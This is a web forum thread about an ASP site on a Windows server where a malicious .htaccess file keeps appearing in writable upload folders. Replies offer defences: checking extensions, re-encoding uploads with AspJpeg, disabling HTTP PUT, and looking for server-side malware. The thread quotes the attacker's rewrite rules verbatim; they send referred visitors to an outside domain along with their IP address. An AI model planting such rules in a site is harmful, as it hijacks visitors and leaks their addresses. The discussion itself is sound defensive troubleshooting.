I have an ASP web site, on a Windows server, that allows users to upload image files after logging into a control panel.

To do this, write access is enabled on the folder that the images are uploaded to. This has worked fine for a long time.

However I recently discovered that a malicious .htaccess file had been uploaded to this folder. The file was not uploaded using my form for uploading images.

This .htaccess was preventing the uploaded images from being viewed on the web site with the following code:
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^http://
RewriteCond %{HTTP_REFERER} !%{HTTP_HOST} RewriteRule .
http://84f6a4eef61784b33e4acbd32c8fdd72.com/%{REMOTE_ADDR}

If I deleted the file, it would soon reappear.

How can I fix this problem, so that users can continue to upload images after logging into my control panel, but malicious files like this cannot be uploaded?

I understand that allowing write access on a folder means that this is a potential issue, but how do they actually upload the file? What type of program are they using? How do you do an HTTP upload without using a file on the server? To upload images normally, users have to use the ASP code I wrote which sits on the server.

Two suggestions:

(1) Check the file name and file type!! If that file had been named even ".htaccess.jpg" it wouldn't have done anything. So as part of your upload process, *ONLY* allow files with known image extensions (e.g., ".jpg", ".jpeg", ".gif", ".png").

(2) Validate that the file uploaded *IS* an image. You can do this if you have a component such as AspJpeg available to you. This is what I do:
-- For all upload image files, I do *not* save them directly to disk.
-- Instead, I first get them into the upload components memory buffer and then I load them into AspJpeg.
-- If AspJpeg chokes on the file, I know it's not an image, and so I reject it.
-- It's possible to hide bogus info in an image file, so I then RESIZE the image, using AspJpeg. Besides, this is a good thing to do, to make sure that the uploaded images aren't too large.
-- I then store the images to disk, finally, after being resized, and I always store them as JPEG images (could instead always store as PNG).

So far, this has worked. Those few malicious uploads that I've gotten have been stopped completely. In the process of resizing the image, even those images with embedded viruses get their viruses stripped off, because AspJpeg simply saves *ONLY* the actual image bits, after the resize, *AND* completely re-does the JPEG (or PNG) compression, discarding the original compression information.

If you mean that the hackers are doing this WITHOUT using your upload control, then probably they are using HTTP PUT. Yes, there really is a little-know command in the HTTP protocol that simply does a PUT directly to the server. (This is in addition to GET and POST and HEAD). Look here:
http://msdn.microsoft.com/en-us/library/aa227461%28v=vs.60%29.aspx

You *should* be able to configure IIS to not allow PUT commands.

Thanks for the replies. Yes the files are being uploaded without the use of my upload form (my upload form is only accessible within a password protected control panel).

I even checked the log files one of the times the files appeared and there was no record of these files being uploaded at the time they were uploaded.

The other night (the early hours of Christmas morning in fact), I was deleting the files and within 15 mins, perhaps less, they had reappeared! It is obviously an automated hacking spamming system that was doing it.

Also, the malicious .htaccess file appeared in 8 different folders that had write access enabled, one of which was a database folder above the wwwroot folder (can you do that with http put?). 4 of the folders were folders within a folder for a phpbb forum (cache, avatars upload folder, etc). 2 were pictures folders, 1 was the database folder and 1 was a folder that shouldn't have had write access enabled so I disabled it.

You *should* be able to configure IIS to not allow PUT commands.
If this is the case, will I still be able to upload images from my upload form (using ASPUpload) if HTTP PUT is disabled?
Thanks.

Ugh. You've picked up a virus somewhere, I would guess. No, HTTP PUT can't "put" anything into any non-web-accessible folder. That has to be happening thanks to some malicious code running on your server.